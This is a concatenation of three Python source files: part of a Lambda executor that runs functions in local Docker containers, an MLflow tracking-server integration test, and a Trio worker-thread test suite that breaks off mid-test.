def run_lambda_executor(self, cmd, env_vars={}, asynchronous=False):
process = run(cmd, asynchronous=True, stderr=subprocess.PIPE, outfile=subprocess.PIPE, env_vars=env_vars)
if asynchronous:
result = '{"asynchronous": "%s"}' % asynchronous
log_output = 'Lambda executed asynchronously'
else:
return_code = process.wait()
result = to_str(process.stdout.read())
log_output = to_str(process.stderr.read())
if return_code != 0:
raise Exception('Lambda process returned error status code: %s. Output:\n%s' %
(return_code, log_output))
return result, log_output
# holds information about an existing container.
class ContainerInfo:
"""
Contains basic information about a docker container.
"""
def __init__(self, name, entry_point):
self.name = name
self.entry_point = entry_point
class LambdaExecutorContainers(LambdaExecutor):
""" Abstract executor class for executing Lambda functions in Docker containers """
def prepare_execution(self, func_arn, env_vars, runtime, command, handler, lambda_cwd):
raise Exception('Not implemented')
def execute(self, func_arn, func_details, event, context=None, version=None, asynchronous=False):
lambda_cwd = func_details.cwd
runtime = func_details.runtime
handler = func_details.handler
environment = func_details.envvars.copy()
# configure USE_SSL in environment
if config.USE_SSL:
environment['USE_SSL'] = '1'
# prepare event body
if not event:
LOG.warning('Empty event body specified for invocation of Lambda "%s"' % func_arn)
event = {}
event_body = json.dumps(event)
event_body_escaped = event_body.replace("'", "\\'")
docker_host = config.DOCKER_HOST_FROM_CONTAINER
# amend the environment variables for execution
environment['AWS_LAMBDA_EVENT_BODY'] = event_body_escaped
environment['HOSTNAME'] = docker_host
environment['LOCALSTACK_HOSTNAME'] = docker_host
if context:
environment['AWS_LAMBDA_FUNCTION_NAME'] = context.function_name
environment['AWS_LAMBDA_FUNCTION_VERSION'] = context.function_version
environment['AWS_LAMBDA_FUNCTION_INVOKED_ARN'] = context.invoked_function_arn
# custom command to execute in the container
command = ''
# if running a Java Lambda, set up classpath arguments
if runtime == LAMBDA_RUNTIME_JAVA8:
# copy executor jar into temp directory
cp_r(LAMBDA_EXECUTOR_JAR, lambda_cwd)
# TODO cleanup once we have custom Java Docker image
taskdir = '/var/task'
save_file(os.path.join(lambda_cwd, LAMBDA_EVENT_FILE), event_body)
command = ("bash -c 'cd %s; java -cp .:`ls *.jar | tr \"\\n\" \":\"` \"%s\" \"%s\" \"%s\"'" %
(taskdir, LAMBDA_EXECUTOR_CLASS, handler, LAMBDA_EVENT_FILE))
# determine the command to be executed (implemented by subclasses)
cmd = self.prepare_execution(func_arn, environment, runtime, command, handler, lambda_cwd)
# lambci writes the Lambda result to stdout and logs to stderr, fetch it from there!
LOG.debug('Running lambda cmd: %s' % cmd)
result, log_output = self.run_lambda_executor(cmd, environment, asynchronous)
LOG.debug('Lambda result / log output:\n%s\n>%s' % (result.strip(), log_output.strip().replace('\n', '\n> ')))
return result, log_output
class LambdaExecutorReuseContainers(LambdaExecutorContainers):
""" Executor class for executing Lambda functions in re-usable Docker containers """
def __init__(self):
super(LambdaExecutorReuseContainers, self).__init__()
# keeps track of each function arn and the last time it was invoked
self.function_invoke_times = {}
# locking thread for creation/destruction of docker containers.
self.docker_container_lock = threading.RLock()
def prepare_execution(self, func_arn, env_vars, runtime, command, handler, lambda_cwd):
# check whether the Lambda has been invoked before
has_been_invoked_before = func_arn in self.function_invoke_times
# set the invocation time
self.function_invoke_times[func_arn] = time.time()
# create/verify the docker container is running.
LOG.debug('Priming docker container with runtime "%s" and arn "%s".', runtime, func_arn)
container_info = self.prime_docker_container(runtime, func_arn, env_vars.items(), lambda_cwd)
# Note: currently "docker exec" does not support --env-file, i.e., environment variables can only be
# passed directly on the command line, using "-e" below. TODO: Update this code once --env-file is
# available for docker exec, to better support very large Lambda events (very long environment values)
exec_env_vars = ' '.join(['-e {}="${}"'.format(k, k) for (k, v) in env_vars.items()])
if not command:
command = '%s %s' % (container_info.entry_point, handler)
# determine files to be copied into the container
copy_command = ''
event_file = os.path.join(lambda_cwd, LAMBDA_EVENT_FILE)
if not has_been_invoked_before:
# if this is the first invocation: copy the entire folder into the container
copy_command = 'docker cp "%s/." "%s:/var/task"; ' % (lambda_cwd, container_info.name)
elif os.path.exists(event_file):
# otherwise, copy only the event file if it exists
copy_command = 'docker cp "%s" "%s:/var/task"; ' % (event_file, container_info.name)
cmd = (
'%s' # copy files command
'docker exec'
' %s' # env variables
' %s' # container name
' %s' # run cmd
) % (copy_command, exec_env_vars, container_info.name, command)
return cmd
def startup(self):
self.cleanup()
# start a process to remove idle containers
self.start_idle_container_destroyer_interval()
def cleanup(self, arn=None):
if arn:
self.function_invoke_times.pop(arn, None)
return self.destroy_docker_container(arn)
self.function_invoke_times = {}
return self.destroy_existing_docker_containers()
def prime_docker_container(self, runtime, func_arn, env_vars, lambda_cwd):
"""
Prepares a persistent docker container for a specific function.
:param runtime: Lamda runtime environment. python2.7, nodejs6.10, etc.
:param func_arn: The ARN of the lambda function.
:param env_vars: The environment variables for the lambda.
:param lambda_cwd: The local directory containing the code for the lambda function.
:return: ContainerInfo class containing the container name and default entry point.
"""
with self.docker_container_lock:
# Get the container name and id.
container_name = self.get_container_name(func_arn)
LOG.debug('Priming docker container: %s' % container_name)
status = self.get_docker_container_status(func_arn)
# Container is not running or doesn't exist.
if status < 1:
# Make sure the container does not exist in any form/state.
self.destroy_docker_container(func_arn)
env_vars_str = ' '.join(['-e {}={}'.format(k, cmd_quote(v)) for (k, v) in env_vars])
# Create and start the container
LOG.debug('Creating container: %s' % container_name)
cmd = (
'docker create'
' --name "%s"'
' --entrypoint /bin/bash' # Load bash when it starts.
' --interactive' # Keeps the container running bash.
' -e AWS_LAMBDA_EVENT_BODY="$AWS_LAMBDA_EVENT_BODY"'
' -e HOSTNAME="$HOSTNAME"'
' -e LOCALSTACK_HOSTNAME="$LOCALSTACK_HOSTNAME"'
' %s' # env_vars
' lambci/lambda:%s'
) % (container_name, env_vars_str, runtime)
LOG.debug(cmd)
run(cmd, stderr=subprocess.PIPE, outfile=subprocess.PIPE)
LOG.debug('Copying files to container "%s" from "%s".' % (container_name, lambda_cwd))
cmd = (
'docker cp'
' "%s/." "%s:/var/task"'
) % (lambda_cwd, container_name)
LOG.debug(cmd)
run(cmd, stderr=subprocess.PIPE, outfile=subprocess.PIPE)
LOG.debug('Starting container: %s' % container_name)
cmd = 'docker start %s' % (container_name)
LOG.debug(cmd)
run(cmd, stderr=subprocess.PIPE, outfile=subprocess.PIPE)
# give the container some time to start up
time.sleep(1)
# Get the entry point for the image.
LOG.debug('Getting the entrypoint for image: lambci/lambda:%s' % runtime)
cmd = (
'docker image inspect'
' --format="{{ .ContainerConfig.Entrypoint }}"'
' lambci/lambda:%s'
) % (runtime)
LOG.debug(cmd)
run_result = run(cmd, asynchronous=False, stderr=subprocess.PIPE, outfile=subprocess.PIPE)
entry_point = run_result.strip('[]\n\r ')
LOG.debug('Using entrypoint "%s" for container "%s".' % (entry_point, container_name))
return ContainerInfo(container_name, entry_point)
def destroy_docker_container(self, func_arn):
"""
Stops and/or removes a docker container for a specific lambda function ARN.
:param func_arn: The ARN of the lambda function.
:return: None
"""
with self.docker_container_lock:
status = self.get_docker_container_status(func_arn)
# Get the container name and id.
container_name = self.get_container_name(func_arn)
if status == 1:
LOG.debug('Stopping container: %s' % container_name)
cmd = (
'docker stop -t0 %s'
) % (container_name)
LOG.debug(cmd)
run(cmd, asynchronous=False, stderr=subprocess.PIPE, outfile=subprocess.PIPE)
status = self.get_docker_container_status(func_arn)
if status == -1:
LOG.debug('Removing container: %s' % container_name)
cmd = (
'docker rm %s'
) % (container_name)
LOG.debug(cmd)
run(cmd, asynchronous=False, stderr=subprocess.PIPE, outfile=subprocess.PIPE)
def get_all_container_names(self):
"""
Returns a list of container names for lambda containers.
:return: A String[] localstack docker container names for each function.
"""
with self.docker_container_lock:
LOG.debug('Getting all lambda containers names.')
cmd = 'docker ps -a --filter="name=localstack_lambda_*" --format "{{.Names}}"'
LOG.debug(cmd)
cmd_result = run(cmd, asynchronous=False, stderr=subprocess.PIPE, outfile=subprocess.PIPE).strip()
if len(cmd_result) > 0:
container_names = cmd_result.split('\n')
else:
container_names = []
return container_names
def destroy_existing_docker_containers(self):
"""
Stops and/or removes all lambda docker containers for localstack.
:return: None
"""
with self.docker_container_lock:
container_names = self.get_all_container_names()
LOG.debug('Removing %d containers.' % len(container_names))
for container_name in container_names:
cmd = 'docker rm -f %s' % container_name
LOG.debug(cmd)
run(cmd, asynchronous=False, stderr=subprocess.PIPE, outfile=subprocess.PIPE)
def get_docker_container_status(self, func_arn):
"""
Determine the status of a docker container.
:param func_arn: The ARN of the lambda function.
:return: 1 If the container is running,
-1 if the container exists but is not running
0 if the container does not exist.
"""
with self.docker_container_lock:
# Get the container name and id.
container_name = self.get_container_name(func_arn)
# Check if the container is already running.
LOG.debug('Getting container status: %s' % container_name)
cmd = (
'docker ps'
' -a'
' --filter name="%s"'
' --format "{{ .Status }}"'
) % (container_name)
LOG.debug(cmd)
cmd_result = run(cmd, asynchronous=False, stderr=subprocess.PIPE, outfile=subprocess.PIPE)
# If the container doesn't exist. Create and start it.
container_status = cmd_result.strip()
if len(container_status) == 0:
return 0
if container_status.lower().startswith('up '):
return 1
return -1
def idle_container_destroyer(self):
"""
Iterates though all the lambda containers and destroys any container that has
been inactive for longer than MAX_CONTAINER_IDLE_TIME.
:return: None
"""
LOG.info('Checking if there are idle containers.')
current_time = time.time()
for func_arn, last_run_time in self.function_invoke_times.items():
duration = current_time - last_run_time
# not enough idle time has passed
if duration < MAX_CONTAINER_IDLE_TIME:
continue
# container has been idle, destroy it.
self.destroy_docker_container(func_arn)
def start_idle_container_destroyer_interval(self):
"""
Starts a repeating timer that triggers start_idle_container_destroyer_interval every 60 seconds.
Thus checking for idle containers and destroying them.
:return: None
"""
self.idle_container_destroyer()
threading.Timer(60.0, self.start_idle_container_destroyer_interval).start()
def get_container_name(self, func_arn):
"""
Given a function ARN, returns a valid docker container name.
:param func_arn: The ARN of the lambda function.
:return: A docker compatible name for the arn.
"""
return 'localstack_lambda_' + re.sub(r'[^a-zA-Z0-9_.-]', '_', func_arn)
class LambdaExecutorSeparateContainers(LambdaExecutorContainers):
def prepare_execution(self, func_arn, env_vars, runtime, command, handler, lambda_cwd):
entrypoint = ''
if command:
entrypoint = ' --entrypoint ""'
else:
command = '"%s"' % handler
env_vars_string = ' '.join(['-e {}="${}"'.format(k, k) for (k, v) in env_vars.items()])
if config.LAMBDA_REMOTE_DOCKER:
cmd = (
'CONTAINER_ID="$(docker create'
' %s'
' %s'
' "lambci/lambda:%s" %s'
')";'
'docker cp "%s/." "$CONTAINER_ID:/var/task";'
'docker start -a "$CONTAINER_ID";'
) % (entrypoint, env_vars_string, runtime, command, lambda_cwd)
else:
lambda_cwd_on_host = self.get_host_path_for_path_in_docker(lambda_cwd)
cmd = (
'docker run'
'%s -v "%s":/var/task'
' %s'
' --rm'
' "lambci/lambda:%s" %s'
) % (entrypoint, lambda_cwd_on_host, env_vars_string, runtime, command)
return cmd
def get_host_path_for_path_in_docker(self, path):
return re.sub(r'^%s/(.*)$' % config.TMP_FOLDER,
r'%s/\1' % config.HOST_TMP_FOLDER, path)
class LambdaExecutorLocal(LambdaExecutor):
def execute(self, func_arn, func_details, event, context=None, version=None, asynchronous=False):
lambda_cwd = func_details.cwd
environment = func_details.envvars.copy()
# execute the Lambda function in a forked sub-process, sync result via queue
queue = Queue()
lambda_function = func_details.function(version)
def do_execute():
# now we're executing in the child process, safe to change CWD and ENV
if lambda_cwd:
os.chdir(lambda_cwd)
if environment:
os.environ.update(environment)
result = lambda_function(event, context)
queue.put(result)
process = Process(target=do_execute)
process.run()
result = queue.get()
# TODO capture log output during local execution?
log_output = ''
return result, log_output
def execute_java_lambda(self, event, context, handler, main_file):
event_file = EVENT_FILE_PATTERN.replace('*', short_uid())
save_file(event_file, json.dumps(event))
TMP_FILES.append(event_file)
class_name = handler.split('::')[0]
classpath = '%s:%s' % (LAMBDA_EXECUTOR_JAR, main_file)
cmd = 'java -cp %s %s %s %s' % (classpath, LAMBDA_EXECUTOR_CLASS, class_name, event_file)
asynchronous = False
# flip asynchronous flag depending on origin
if 'Records' in event:
# TODO: add more event supporting asynchronous lambda execution
if 'Sns' in event['Records'][0]:
asynchronous = True
if 'dynamodb' in event['Records'][0]:
asynchronous = True
result, log_output = self.run_lambda_executor(cmd, asynchronous=asynchronous)
LOG.debug('Lambda result / log output:\n%s\n> %s' % (result.strip(), log_output.strip().replace('\n', '\n> ')))
return result, log_output
# --------------
# GLOBAL STATE
# --------------
EXECUTOR_LOCAL = LambdaExecutorLocal()
EXECUTOR_CONTAINERS_SEPARATE = LambdaExecutorSeparateContainers()
EXECUTOR_CONTAINERS_REUSE = LambdaExecutorReuseContainers()
DEFAULT_EXECUTOR = EXECUTOR_LOCAL
# the keys of AVAILABLE_EXECUTORS map to the LAMBDA_EXECUTOR config variable
AVAILABLE_EXECUTORS = {
'local': EXECUTOR_LOCAL,
'docker': EXECUTOR_CONTAINERS_SEPARATE,
'docker-reuse': EXECUTOR_CONTAINERS_REUSE
}
|
test_rest_tracking.py
|
"""
Integration test which starts a local Tracking Server on an ephemeral port,
and ensures we can use the tracking API to communicate with it.
"""
import mock
from multiprocessing import Process
import os
import pytest
import socket
import time
import tempfile
from click.testing import CliRunner
import mlflow.experiments
from mlflow.entities import RunStatus
from mlflow.protos.service_pb2 import LOCAL as SOURCE_TYPE_LOCAL
from mlflow.server import app, FILE_STORE_ENV_VAR
from mlflow.tracking import MlflowClient
from mlflow.utils.mlflow_tags import MLFLOW_RUN_NAME, MLFLOW_PARENT_RUN_ID
LOCALHOST = '127.0.0.1'
SERVER_PORT = 0
def _get_safe_port():
"""Returns an ephemeral port that is very likely to be free to bind to."""
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.bind((LOCALHOST, 0))
port = sock.getsockname()[1]
sock.close()
return port
def _await_server_up_or_die(port, timeout=60):
"""Waits until the local flask server is listening on the given port."""
print('Awaiting server to be up on %s:%s' % (LOCALHOST, port))
start_time = time.time()
connected = False
while not connected and time.time() - start_time < timeout:
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.settimeout(2)
result = sock.connect_ex((LOCALHOST, port))
if result == 0:
connected = True
else:
print('Server not yet up, waiting...')
time.sleep(0.5)
if not connected:
raise Exception('Failed to connect on %s:%s after %s seconds' % (LOCALHOST, port, timeout))
print('Server is up on %s:%s!' % (LOCALHOST, port))
# NB: We explicitly wait and timeout on server shutdown in order to ensure that pytest output
# reveals the cause in the event of a test hang due to the subprocess not exiting.
def _await_server_down_or_die(process, timeout=60):
"""Waits until the local flask server process is terminated."""
print('Awaiting termination of server process...')
start_time = time.time()
while process.is_alive() and time.time() - start_time < timeout:
time.sleep(0.5)
if process.is_alive():
raise Exception('Server failed to shutdown after %s seconds' % timeout)
@pytest.fixture(scope="module", autouse=True)
def init_and_tear_down_server(request):
"""
Once per run of the entire set of tests, we create a new server, and
clean it up at the end.
"""
global SERVER_PORT
SERVER_PORT = _get_safe_port()
file_store_path = tempfile.mkdtemp("test_rest_tracking_file_store")
env = {FILE_STORE_ENV_VAR: file_store_path}
with mock.patch.dict(os.environ, env):
process = Process(target=lambda: app.run(LOCALHOST, SERVER_PORT))
process.start()
_await_server_up_or_die(SERVER_PORT)
# Yielding here causes pytest to resume execution at the end of all tests.
yield
print("Terminating server...")
process.terminate()
_await_server_down_or_die(process)
@pytest.fixture()
def tracking_server_uri():
"""Provides a tracking URI for communicating with the local tracking server."""
return "http://{hostname}:{port}".format(hostname=LOCALHOST, port=SERVER_PORT)
@pytest.fixture()
def mlflow_client(tracking_server_uri):
"""Provides an MLflow Tracking API client pointed at the local tracking server."""
return MlflowClient(tracking_server_uri)
@pytest.fixture()
def cli_env(tracking_server_uri):
"""Provides an environment for the MLflow CLI pointed at the local tracking server."""
cli_env = {
"LC_ALL": "en_US.UTF-8",
"LANG": "en_US.UTF-8",
"MLFLOW_TRACKING_URI": tracking_server_uri,
}
return cli_env
def test_create_get_list_experiment(mlflow_client):
experiment_id = mlflow_client.create_experiment('My Experiment',
artifact_location='my_location')
exp = mlflow_client.get_experiment(experiment_id)
assert exp.name == 'My Experiment'
assert exp.artifact_location == 'my_location'
experiments = mlflow_client.list_experiments()
assert set([e.name for e in experiments]) == {'My Experiment'}
def test_delete_restore_experiment(mlflow_client):
experiment_id = mlflow_client.create_experiment('Deleterious')
assert mlflow_client.get_experiment(experiment_id).lifecycle_stage == 'active'
mlflow_client.delete_experiment(experiment_id)
assert mlflow_client.get_experiment(experiment_id).lifecycle_stage == 'deleted'
mlflow_client.restore_experiment(experiment_id)
assert mlflow_client.get_experiment(experiment_id).lifecycle_stage == 'active'
def test_delete_restore_experiment_cli(mlflow_client, cli_env):
experiment_name = "DeleteriousCLI"
CliRunner(env=cli_env).invoke(mlflow.experiments.commands, ['create', experiment_name])
experiment_id = mlflow_client.get_experiment_by_name(experiment_name).experiment_id
assert mlflow_client.get_experiment(experiment_id).lifecycle_stage == 'active'
CliRunner(env=cli_env).invoke(mlflow.experiments.commands, ['delete', str(experiment_id)])
assert mlflow_client.get_experiment(experiment_id).lifecycle_stage == 'deleted'
CliRunner(env=cli_env).invoke(mlflow.experiments.commands, ['restore', str(experiment_id)])
assert mlflow_client.get_experiment(experiment_id).lifecycle_stage == 'active'
def test_rename_experiment(mlflow_client):
experiment_id = mlflow_client.create_experiment('BadName')
assert mlflow_client.get_experiment(experiment_id).name == 'BadName'
mlflow_client.rename_experiment(experiment_id, 'GoodName')
assert mlflow_client.get_experiment(experiment_id).name == 'GoodName'
def test_rename_experiment_cli(mlflow_client, cli_env):
bad_experiment_name = "BadName"
good_experiment_name = "GoodName"
CliRunner(env=cli_env).invoke(mlflow.experiments.commands, ['create', bad_experiment_name])
experiment_id = mlflow_client.get_experiment_by_name(bad_experiment_name).experiment_id
assert mlflow_client.get_experiment(experiment_id).name == bad_experiment_name
CliRunner(env=cli_env).invoke(
mlflow.experiments.commands,
['rename', str(experiment_id), good_experiment_name])
assert mlflow_client.get_experiment(experiment_id).name == good_experiment_name
def test_create_run_all_args(mlflow_client):
create_run_kwargs = {
"user_id": "123",
"run_name": "My name",
"source_type": "LOCAL",
"source_name": "Hello",
"entry_point_name": "entry",
"start_time": 456,
"source_version": "abc",
"tags": {
"my": "tag",
"other": "tag",
},
"parent_run_id": "7",
}
experiment_id = mlflow_client.create_experiment('Run A Lot')
created_run = mlflow_client.create_run(experiment_id, **create_run_kwargs)
run_id = created_run.info.run_uuid
print("Run id=%s" % run_id)
run = mlflow_client.get_run(run_id)
assert run.info.run_uuid == run_id
assert run.info.experiment_id == experiment_id
assert run.info.user_id == create_run_kwargs["user_id"]
assert run.info.source_type == SOURCE_TYPE_LOCAL
assert run.info.source_name == create_run_kwargs["source_name"]
assert run.info.entry_point_name == create_run_kwargs["entry_point_name"]
assert run.info.start_time == create_run_kwargs["start_time"]
assert run.info.source_version == create_run_kwargs["source_version"]
actual_tags = {t.key: t.value for t in run.data.tags}
for tag in create_run_kwargs["tags"]:
assert tag in actual_tags
assert actual_tags.get(MLFLOW_RUN_NAME) == create_run_kwargs["run_name"]
assert actual_tags.get(MLFLOW_PARENT_RUN_ID) == create_run_kwargs["parent_run_id"]
assert mlflow_client.list_run_infos(experiment_id) == [run.info]
def test_create_run_defaults(mlflow_client):
experiment_id = mlflow_client.create_experiment('Run A Little')
created_run = mlflow_client.create_run(experiment_id)
run_id = created_run.info.run_uuid
run = mlflow_client.get_run(run_id)
assert run.info.run_uuid == run_id
assert run.info.experiment_id == experiment_id
assert run.info.user_id is not None # we should pick some default
def test_log_metrics_params_tags(mlflow_client):
experiment_id = mlflow_client.create_experiment('Oh My')
created_run = mlflow_client.create_run(experiment_id)
run_id = created_run.info.run_uuid
mlflow_client.log_metric(run_id, 'metric', 123.456)
mlflow_client.log_param(run_id, 'param', 'value')
mlflow_client.set_tag(run_id, 'taggity', 'do-dah')
run = mlflow_client.get_run(run_id)
metrics = {t.key: t.value for t in run.data.metrics}
params = {t.key: t.value for t in run.data.params}
tags = {t.key: t.value for t in run.data.tags}
assert metrics.get('metric') == 123.456
assert params.get('param') == 'value'
assert tags.get('taggity') == 'do-dah'
def test_set_terminated_defaults(mlflow_client):
experiment_id = mlflow_client.create_experiment('Terminator 1')
created_run = mlflow_client.create_run(experiment_id)
run_id = created_run.info.run_uuid
assert RunStatus.to_string(mlflow_client.get_run(run_id).info.status) == 'RUNNING'
assert mlflow_client.get_run(run_id).info.end_time is None
mlflow_client.set_terminated(run_id)
assert RunStatus.to_string(mlflow_client.get_run(run_id).info.status) == 'FINISHED'
assert mlflow_client.get_run(run_id).info.end_time <= int(time.time() * 1000)
def test_set_terminated_status(mlflow_client):
experiment_id = mlflow_client.create_experiment('Terminator 2')
created_run = mlflow_client.create_run(experiment_id)
run_id = created_run.info.run_uuid
assert RunStatus.to_string(mlflow_client.get_run(run_id).info.status) == 'RUNNING'
assert mlflow_client.get_run(run_id).info.end_time is None
mlflow_client.set_terminated(run_id, 'FAILED')
assert RunStatus.to_string(mlflow_client.get_run(run_id).info.status) == 'FAILED'
assert mlflow_client.get_run(run_id).info.end_time <= int(time.time() * 1000)
def test_artifacts(mlflow_client):
experiment_id = mlflow_client.create_experiment('Art In Fact')
created_run = mlflow_client.create_run(experiment_id)
run_id = created_run.info.run_uuid
src_dir = tempfile.mkdtemp('test_artifacts_src')
src_file = os.path.join(src_dir, 'my.file')
with open(src_file, 'w') as f:
f.write('Hello, World!')
mlflow_client.log_artifact(run_id, src_file, None)
mlflow_client.log_artifacts(run_id, src_dir, 'dir')
root_artifacts_list = mlflow_client.list_artifacts(run_id)
assert set([a.path for a in root_artifacts_list]) == {'my.file', 'dir'}
dir_artifacts_list = mlflow_client.list_artifacts(run_id, 'dir')
assert set([a.path for a in dir_artifacts_list]) == {'dir/my.file'}
all_artifacts = mlflow_client.download_artifacts(run_id, '.')
assert open('%s/my.file' % all_artifacts, 'r').read() == 'Hello, World!'
assert open('%s/dir/my.file' % all_artifacts, 'r').read() == 'Hello, World!'
dir_artifacts = mlflow_client.download_artifacts(run_id, 'dir')
assert open('%s/my.file' % dir_artifacts, 'r').read() == 'Hello, World!'
|
test_threads.py
|
import threading
import queue as stdlib_queue
import time
import pytest
from .. import _core
from .. import Event, CapacityLimiter, sleep
from ..testing import wait_all_tasks_blocked
from .._threads import (
to_thread_run_sync,
current_default_thread_limiter,
from_thread_run,
from_thread_run_sync,
BlockingTrioPortal,
)
from .._core.tests.test_ki import ki_self
async def test_do_in_trio_thread():
trio_thread = threading.current_thread()
async def check_case(do_in_trio_thread, fn, expected, trio_token=None):
record = []
def threadfn():
try:
record.append(("start", threading.current_thread()))
x = do_in_trio_thread(fn, record, trio_token=trio_token)
record.append(("got", x))
except BaseException as exc:
print(exc)
record.append(("error", type(exc)))
child_thread = threading.Thread(target=threadfn, daemon=True)
child_thread.start()
while child_thread.is_alive():
print("yawn")
await sleep(0.01)
assert record == [("start", child_thread), ("f", trio_thread), expected]
token = _core.current_trio_token()
def f(record):
assert not _core.currently_ki_protected()
record.append(("f", threading.current_thread()))
return 2
await check_case(from_thread_run_sync, f, ("got", 2), trio_token=token)
def f(record):
assert not _core.currently_ki_protected()
record.append(("f", threading.current_thread()))
raise ValueError
await check_case(from_thread_run_sync, f, ("error", ValueError), trio_token=token)
async def f(record):
assert not _core.currently_ki_protected()
await _core.checkpoint()
record.append(("f", threading.current_thread()))
return 3
await check_case(from_thread_run, f, ("got", 3), trio_token=token)
async def f(record):
assert not _core.currently_ki_protected()
await _core.checkpoint()
record.append(("f", threading.current_thread()))
raise KeyError
await check_case(from_thread_run, f, ("error", KeyError), trio_token=token)
async def test_do_in_trio_thread_from_trio_thread():
with pytest.raises(RuntimeError):
from_thread_run_sync(lambda: None) # pragma: no branch
async def foo(): # pragma: no cover
pass
with pytest.raises(RuntimeError):
from_thread_run(foo)
def test_run_in_trio_thread_ki():
# if we get a control-C during a run_in_trio_thread, then it propagates
# back to the caller (slick!)
record = set()
async def check_run_in_trio_thread():
token = _core.current_trio_token()
def trio_thread_fn():
print("in Trio thread")
assert not _core.currently_ki_protected()
print("ki_self")
try:
ki_self()
finally:
import sys
print("finally", sys.exc_info())
async def trio_thread_afn():
trio_thread_fn()
def external_thread_fn():
try:
print("running")
from_thread_run_sync(trio_thread_fn, trio_token=token)
except KeyboardInterrupt:
print("ok1")
record.add("ok1")
try:
from_thread_run(trio_thread_afn, trio_token=token)
except KeyboardInterrupt:
print("ok2")
record.add("ok2")
thread = threading.Thread(target=external_thread_fn)
thread.start()
print("waiting")
while thread.is_alive():
await sleep(0.01)
print("waited, joining")
thread.join()
print("done")
_core.run(check_run_in_trio_thread)
assert record == {"ok1", "ok2"}
def test_await_in_trio_thread_while_main_exits():
record = []
ev = Event()
async def trio_fn():
record.append("sleeping")
ev.set()
await _core.wait_task_rescheduled(lambda _: _core.Abort.SUCCEEDED)
def thread_fn(token):
try:
from_thread_run(trio_fn, trio_token=token)
except _core.Cancelled:
record.append("cancelled")
async def main():
token = _core.current_trio_token()
thread = threading.Thread(target=thread_fn, args=(token,))
thread.start()
await ev.wait()
assert record == ["sleeping"]
return thread
thread = _core.run(main)
thread.join()
assert record == ["sleeping", "cancelled"]
async def test_run_in_worker_thread():
trio_thread = threading.current_thread()
def f(x):
return (x, threading.current_thread())
x, child_thread = await to_thread_run_sync(f, 1)
assert x == 1
assert child_thread != trio_thread
def g():
raise ValueError(threading.current_thread())
with pytest.raises(ValueError) as excinfo:
await to_thread_run_sync(g)
print(excinfo.value.args)
assert excinfo.value.args[0] != trio_thread
async def test_run_in_worker_thread_cancellation():
register = [None]
def f(q):
# Make the thread block for a controlled amount of time
register[0] = "blocking"
q.get()
register[0] = "finished"
async def child(q, cancellable):
record.append("start")
try:
return await to_thread_run_sync(f, q, cancellable=cancellable)
finally:
record.append("exit")
record = []
q = stdlib_queue.Queue()
async with _core.open_nursery() as nursery:
nursery.start_soon(child, q, True)
# Give it a chance to get started. (This is important because
# to_thread_run_sync does a checkpoint_if_cancelled before
# blocking on the thread, and we don't want to trigger this.)
await wait_all_tasks_blocked()
assert record == ["start"]
# Then cancel it.
nursery.cancel_scope.cancel()
# The task exited, but the thread didn't:
assert register[0] != "finished"
# Put the thread out of its misery:
q.put(None)
while register[0] != "finished":
time.sleep(0.01)
# This one can't be cancelled
record = []
register[0] = None
async with _core.open_nursery() as nursery:
nursery.start_soon(child, q, False)
await wait_all_tasks_blocked()
nursery.cancel_scope.cancel()
with _core.CancelScope(shield=True):
for _ in range(10):
await _core.checkpoint()
# It's still running
assert record == ["start"]
q.put(None)
# Now it exits
# But if we cancel *before* it enters, the entry is itself a cancellation
# point
with _core.CancelScope() as scope:
scope.cancel()
await child(q, False)
assert scope.cancelled_caught
# Make sure that if trio.run exits, and then the thread finishes, then that's
# handled gracefully. (Requires that the thread result machinery be prepared
# for call_soon to raise RunFinishedError.)
def test_run_in_worker_thread_abandoned(capfd, monkeypatch):
monkeypatch.setattr(_core._thread_cache, "IDLE_TIMEOUT", 0.01)
q1 = stdlib_queue.Queue()
q2 = stdlib_queue.Queue()
def thread_fn():
q1.get()
q2.put(threading.current_thread())
async def main():
async def child():
await to_thread_run_sync(thread_fn, cancellable=True)
async with _core.open_nursery() as nursery:
nursery.start_soon(child)
await wait_all_tasks_blocked()
nursery.cancel_scope.cancel()
_core.run(main)
q1.put(None)
# This makes sure:
# - the thread actually ran
# - that thread has finished before we check for its output
thread = q2.get()
while thread.is_alive():
time.sleep(0.01) # pragma: no cover
# Make sure we don't have a "Exception in thread ..." dump to the console:
out, err = capfd.readouterr()
assert not out and not err
@pytest.mark.parametrize("MAX", [3, 5, 10])
@pytest.mark.parametrize("cancel", [False, True])
@pytest.mark.parametrize("use_default_limiter", [False, True])
async def test_run_in_worker_thread_limiter(MAX, cancel, use_default_limiter):
# This test is a bit tricky. The goal is to make sure that if we set
# limiter=CapacityLimiter(MAX), then in fact only MAX threads are ever
# running at a time, even if there are more concurrent calls to
# to_thread_run_sync, and even if some of those are cancelled. And
# also to make sure that the default limiter actually limits.
COUNT = 2 * MAX
gate = threading.Event()
lock = threading.Lock()
if use_default_limiter:
c = current_default_thread_limiter()
orig_total_tokens = c.total_tokens
c.total_tokens = MAX
limiter_arg = None
else:
c = CapacityLimiter(MAX)
orig_total_tokens = MAX
limiter_arg = c
try:
# We used to use regular variables and 'nonlocal' here, but it turns
# out that it's not safe to assign to closed-over variables that are
# visible in multiple threads, at least as of CPython 3.6 and PyPy
# 5.8:
#
# https://bugs.python.org/issue30744
# https://bitbucket.org/pypy/pypy/issues/2591/
#
# Mutating them in-place is OK though (as long as you use proper
# locking etc.).
class state:
pass
state.ran = 0
state.high_water = 0
state.running = 0
state.parked = 0
token = _core.current_trio_token()
def thread_fn(cancel_scope):
print("thread_fn start")
from_thread_run_sync(cancel_scope.cancel, trio_token=token)
with lock:
state.ran += 1
state.running += 1
state.high_water = max(state.high_water, state.running)
# The Trio thread below watches this value and uses it as a
# signal that all the stats calculations have finished.
state.parked += 1
gate.wait()
with lock:
state.parked -= 1
state.running -= 1
print("thread_fn exiting")
async def run_thread(event):
with _core.CancelScope() as cancel_scope:
await to_thread_run_sync(
thread_fn, cancel_scope, limiter=limiter_arg, cancellable=cancel,
)
print("run_thread finished, cancelled:", cancel_scope.cancelled_caught)
event.set()
async with _core.open_nursery() as nursery:
print("spawning")
events = []
for i in range(COUNT):
events.append(Event())
nursery.start_soon(run_thread, events[-1])
await wait_all_tasks_blocked()
# In the cancel case, we in particular want to make sure that the
# cancelled tasks don't release the semaphore. So let's wait until
# at least one of them has exited, and that everything has had a
# chance to settle down from this, before we check that everyone
# who's supposed to be waiting is waiting:
if cancel:
print("waiting for first cancellation to clear")
await events[0].wait()
